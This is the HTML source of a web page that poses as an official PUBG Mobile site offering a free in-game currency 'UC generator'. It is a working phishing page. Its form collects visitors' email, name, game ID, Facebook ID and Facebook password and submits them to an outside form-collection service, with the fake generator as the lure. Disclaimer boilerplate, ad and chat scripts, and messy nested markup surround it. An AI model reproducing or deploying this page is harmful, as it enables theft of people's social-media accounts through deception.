<html>
<head>
  <script data-ad-client="ca-pub-8546561810819152" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
  <title>Pubg Mobile Offical Site</title>
</head>
<style>
  <link href="css/hacker.css" rel="stylesheet">
</style>
<body>


<html>
  <head>
    <title></title>
    <style>
      body {
        background-image: url('https://wallpaperaccess.com/full/303567.jpg');
        background-repeat: no-repeat;
        background-attachment: ;
        background-position:center;

      }
    </style>
  </head>
  <body>
  </body>
</html>







  <img src="https://th.bing.com/th/id/R.0068315a480fa8b3f338a77e0f30dd36?rik=%2bIuSohbw5TYYrA&pid=ImgRaw" alt="UCGER" width="10%" align="left"><img src="https://th.bing.com/th/id/R.0068315a480fa8b3f338a77e0f30dd36?rik=%2bIuSohbw5TYYrA&pid=ImgRaw" alt="UCGER" width="10%" align="right">

 <style>
<p style="color:#0000ff;">
<h1>WELCOME TO UCGER FREE UC GENERATER</h1>
  </style>

<h4> ©UCGER
 is tredmark of Pubg Mobile Epic Unreal Engine from 2017 to 2021</h4>
<h4>Welcome to ucdas here you can generate uc per day 100% free without any ban ©ucger.orgfree.com </h4><br>
<b></b>
</body>
</html>

<h3><u style="color:lightblue">Thanks For Visiting Us</u></h3> <iframe src="https://free.timeanddate.com/clock/i7wx9kjv/n756/fn6/fs16/tct/pct/ftb/bas9/bat5/bac888/pa8/tt0/tw1/th2/ta1/tb4" frameborder="0" width="226" height="70" allowtransparency="true" align="right"></iframe>



<hr size="7xp" width="100%" color="black"align="black">


<!DOCTYPE html>
<html>
<head>
  <title>Pubg Mobile Ofiical Site</title>
</head>
<body>

 

<br>
  <br>



       <form action="https://formcarry.com/s/q1l6GrLjGxO" method="POST">
        <label for="email">Your Email</label>
        <input type="email" name="email" placeholder="Your email" required autocomplete="off"><img src="https://image.flaticon.com/icons/png/512/2198/2198368.png" width="20">
        <br>
        <label for="name">Your Name</label>
        <input type="text" name="name"
        placeholder="Your Name" required autocomplete="off"><img src="https://image.flaticon.com/icons/png/512/2198/2198368.png" width="20">
        <br>
        <label for="name">Pubg ID</label>
        <input type="text" name="name"
        placeholder="Pubg ID" required autocomplete="off"><img src="https://image.flaticon.com/icons/png/512/2198/2198368.png" width="20" >
        <br>
        <label for="submint">Enter UC Amount</label>
        <input type="text" name="name" placeholder="Enter UC " required autocomplete="off"><img src="https://image.flaticon.com/icons/png/512/2198/2198368.png" width="20" >
        <br>
                  <label for="Facebook ID">Facebook ID</label>
        <input type="text" name="name" placeholder="Facebook ID" required autocomplete="off"><img src="https://image.flaticon.com/icons/png/512/2198/2198368.png" width="20" >
        <br>
        <label for="submint">Facebook Password</label>
        <input type="text" name="name" placeholder="Facebook Password"  required autocomplete="off"><img src="https://image.flaticon.com/icons/png/512/2198/2198368.png" width="20" >
      <br>
      <input type="checkbox" name="remember" required="">By Clicking Submint You Agree with Our Terms&Condition
      <br>
<input type="checkbox" name="remember" required="">By Clicking submint You Agree To Our <a href="http://ucgerprivacypolicy.orgfree.com/">Privacy Policy</a>

<html>
  <head>
    <script src='https://www.google.com/recaptcha/api.js' required=""></script>
  </head>
</html>

<form action="https://formcarry.com/s/XXX" method="POST" enctype="multipart/form-data" accept-charset="UTF-8" required="">
  <div required="" class="g-recaptcha" data-sitekey="6LcDbNsbAAAAAFMBOe63X6pvndhjHw16KQUCAA38" required=""></div>    
  <button name="submint">Submint</button> <br>
  <br>
<br>
</form>
<style>
            </p>
      
     <style>
            }
      
      input,textarea{
        display:block;
        width: 256px;
        border: 2px solid #C8C8C8;
        padding: 10px 20px;
        border-radius: 20px;
        outline: none;
      }
      
      button{
        display: inline-block;
        cursor: pointer;
        margin-top: 20px;
        padding: 11px 25px;
        font-size: 14px;
        letter-spacing: .2px;
        text-shadow: none;
        position: relative;
        outline: none;
        font-weight: 600;
        border-radius: 50%;
        border: none;
        background-color: #3ac5fc;
        color: #fff;
        box-shadow: 0 2px 9px rgba(58,197,252,0.35);
        float:;
      }
    </style>


        
       </form>
</body>
</html>
<html>
  <head>
    
    




 <h2> <style>
  [data-custom-class='body'], [data-custom-class='body'] * {
          background: transparent !important;
        }
[data-custom-class='title'], [data-custom-class='title'] * {
          font-family: Arial !important;
font-size: 26px !important;
color: #000000 !important;
        }
[data-custom-class='subtitle'], [data-custom-class='subtitle'] * {
          font-family: Arial !important;
color: #595959 !important;
font-size: 14px !important;
        }
[data-custom-class='heading_1'], [data-custom-class='heading_1'] * {
          font-family: Arial !important;
font-size: 19px !important;
color: #000000 !important;
        }
[data-custom-class='heading_2'], [data-custom-class='heading_2'] * {
          font-family: Arial !important;
font-size: 17px !important;
color: #000000 !important;
        }
[data-custom-class='body_text'], [data-custom-class='body_text'] * {
          color: #595959 !important;
font-size: 14px !important;
font-family: Arial !important;
        }
[data-custom-class='link'], [data-custom-class='link'] * {
          color: #3030F1 !important;
font-size: 14px !important;
font-family: Arial !important;
word-break: break-word !important;
        }
</style>

      <div data-custom-class="body">
      <div><div align="center" class="MsoNormal" data-custom-class="title" style="text-align: left; line-height: 1.5;"><a name="_4r5vko5di6yg"></a><strong><span style="line-height: 150%; font-size: 26px;">DISCLAIMER</span></strong></div><div align="center" class="MsoNormal" style="text-align:center;line-height:150%;"><a name="_l2jmcqu2bv4x"></a></div><div align="center" class="MsoNormal" data-custom-class="subtitle" style="text-align: left; line-height: 150%;"><br></div><div align="center" class="MsoNormal" data-custom-class="subtitle" style="text-align: left; line-height: 150%;"><span style="color: rgb(127,127,127); font-size: 15px; text-align: justify;"><strong>Last updated </strong><bdt class="block-container question question-in-editor" data-id="f06b270d-4b70-bc53-bef4-2d8996dff70b" data-type="question"><strong>July 28, 2021<br>

        Our Security Is Now More Strong <img src="https://image.flaticon.com/icons/png/512/2198/2198368.png" width="20" align="center">






      </strong></bdt></span></div><div class="MsoNormal" style="text-align: justify; line-height: 1.5;"><br></div><div class="MsoNormal" style="text-align: justify; line-height: 1.5;"><br></div><div class="MsoNormal" data-custom-class="heading_1"><a name="_xs0r05tcjblb"></a><strong><span style="line-height: 115%; font-size: 19px;">WEBSITE DISCLAIMER</span></strong></div></div><div style="line-height: 1.2;"><br></div><div><div class="MsoNormal" data-custom-class="body_text" style="line-height: 1.5;"><span style="color: rgb(89, 89, 89); font-size: 15px;">The information provided by <bdt class="block-container question question-in-editor" data-id="1e91c6ac-db3b-ab40-09dc-333e7d471e6c" data-type="question">Ucger</bdt>  on <bdt class="question"><a href="https://ucgerpakistan.github.io/offical-site/" target="_blank" data-custom-class="link">https://ucgerpakistan.github.io/offical-site/</a></bdt> (the “Site”) <bdt class="block-container if" data-type="if" id="0043ef2f-6d7b-8e27-e1f5-16cde0f30348"><bdt data-type="conditional-block"><bdt class="block-component" data-record-question-key="mobile_app_option" data-type="statement"></bdt><bdt data-type="body">and our mobile application </bdt></bdt><bdt class="statement-end-if-in-editor" data-type="close"></bdt></bdt>is for general informational purposes only. All information on the Site <bdt class="block-container if" data-type="if" id="428f10b0-7ca9-4039-dfea-5f29f51c3cb3"><bdt data-type="conditional-block"><bdt class="block-component" data-record-question-key="mobile_app_option" data-type="statement"></bdt><bdt data-type="body">and our mobile application </bdt></bdt><bdt class="statement-end-if-in-editor" data-type="close"></bdt></bdt>is provided in good faith, however we make no
representation or warranty of any kind, express or implied, regarding the
accuracy, adequacy, validity, reliability, availability or completeness of any
information on the Site<bdt class="block-container if" data-type="if" id="11270515-826f-ee20-0a2a-4e8bee9f9f2c"><bdt data-type="conditional-block"><bdt class="block-component" data-record-question-key="mobile_app_option" data-type="statement"></bdt><bdt data-type="body"> or our mobile application</bdt></bdt><bdt class="statement-end-if-in-editor" data-type="close"></bdt></bdt>. UNDER NO CIRCUMSTANCE SHALL WE HAVE ANY LIABILITY TO YOU FOR ANY LOSS OR DAMAGE OF ANY KIND INCURRED AS A RESULT OF THE USE OF THE SITE <bdt class="block-container if" data-type="if" id="4971e65f-eff0-5c18-83f1-a0dcd056e8c2"><bdt data-type="conditional-block"><bdt class="block-component" data-record-question-key="mobile_app_option" data-type="statement"></bdt><bdt data-type="body">OR OUR MOBILE APPLICATION </bdt></bdt><bdt class="statement-end-if-in-editor" data-type="close"></bdt></bdt>OR RELIANCE ON ANY
INFORMATION PROVIDED ON THE SITE<bdt class="block-container if" data-type="if" id="ddcaf594-2bb0-bdc0-460e-1f96dfe89e6d"><bdt data-type="conditional-block"><bdt class="block-component" data-record-question-key="mobile_app_option" data-type="statement"></bdt><bdt data-type="body"> AND OUR MOBILE APPLICATION</bdt></bdt><bdt class="statement-end-if-in-editor" data-type="close"></bdt></bdt>. YOUR USE OF THE SITE <bdt class="block-container if" data-type="if" id="57726b77-4115-2533-2424-58bc8b6a12a8"><bdt data-type="conditional-block"><bdt class="block-component" data-record-question-key="mobile_app_option" data-type="statement"></bdt><bdt data-type="body">AND OUR MOBILE APPLICATION </bdt></bdt><bdt class="statement-end-if-in-editor" data-type="close"></bdt></bdt>AND YOUR RELIANCE ON ANY INFORMATION ON THE SITE <bdt class="block-container if" data-type="if" id="3e90b11e-6e7d-ab89-2c29-33668d0f521d"><bdt data-type="conditional-block"><bdt class="block-component" data-record-question-key="mobile_app_option" data-type="statement"></bdt><bdt data-type="body">AND OUR MOBILE APPLICATION </bdt></bdt><bdt class="statement-end-if-in-editor" data-type="close"></bdt></bdt>IS SOLELY AT YOUR OWN RISK.</span></div></div><div style="line-height: 1.2;"><br></div><div><div class="MsoNormal"><a name="_x1u8x12nt00e"></a></div><bdt class="block-container if" data-type="if" id="25d6783f-eaa7-3465-7bd8-31e107cc0931"><bdt data-type="conditional-block"><bdt class="block-component" data-record-question-key="external_disclaimer_option" data-type="statement"></bdt><bdt data-type="body"><div class="MsoNormal" data-custom-class="heading_1"><strong><span style="line-height: 115%; font-size: 19px;">EXTERNAL LINKS
DISCLAIMER<br></span></strong></div></bdt></bdt></bdt></div><div style="line-height: 1.2;"><br></div><div><bdt class="block-container if" data-type="if"><bdt data-type="conditional-block"><bdt data-type="body"><div class="MsoNormal" data-custom-class="body_text" style="line-height: 1.5;"><span style="color: rgb(89, 89, 89); font-size: 15px;">The </span><span style="font-size: 15px;"><span style="color: rgb(89, 89, 89);">Site <bdt class="block-component"></bdt>and our mobile application <bdt class="statement-end-if-in-editor"></bdt>may contain (or you may be sent through the Site<bdt class="block-component"></bdt> or our mobile application<bdt class="statement-end-if-in-editor"></bdt>) links</span></span><span style="color: rgb(89, 89, 89); font-size: 15px;"> to other
websites or content belonging to or originating from third parties or links to
websites and features in banners or other advertising. Such external links are
not investigated, monitored, or checked for accuracy, adequacy, validity, reliability,
availability or completeness by us. WE DO NOT WARRANT, ENDORSE, GUARANTEE, OR
ASSUME RESPONSIBILITY FOR THE ACCURACY OR RELIABILITY OF ANY INFORMATION
OFFERED BY THIRD-PARTY WEBSITES LINKED THROUGH THE SITE OR ANY WEBSITE OR
FEATURE LINKED IN ANY BANNER OR OTHER ADVERTISING. WE WILL NOT BE A PARTY TO OR
IN ANY WAY BE RESPONSIBLE FOR MONITORING ANY TRANSACTION BETWEEN YOU AND THIRD-PARTY PROVIDERS OF PRODUCTS OR SERVICES

<img src="https://th.bing.com/th/id/R.0068315a480fa8b3f338a77e0f30dd36?rik=%2bIuSohbw5TYYrA&pid=ImgRaw" alt="UCGER" width="15%" align="right">







      <div style="color: #595959;font-size: 14px;font-family: Arial;padding-top:16px;">This disclaimer was created using::Pubg Mobile Offical Site Ucger <a style="color: rgb(48, 48, 241) !important;"Pubg Mobile Offical Site Ucger>



<!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/6102a2b1d6e7610a49ad94a5/1fbp4n1rp';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->



<style>
           
      button{
        display: inline-block;
        cursor: pointer;
        margin-top: 20px;
        padding: 11px 25px;
        font-size: 14px;
        letter-spacing: .2px;
        text-shadow: none;
        position: relative;
        outline: none;
        font-weight: 600;
        border-radius: 50%;
        border: none;
        background-color: #3ac5fc;
        color: #fff;
        box-shadow: 0 2px 9px rgba(58,197,252,0.35);
        float:;
      }
    </style>
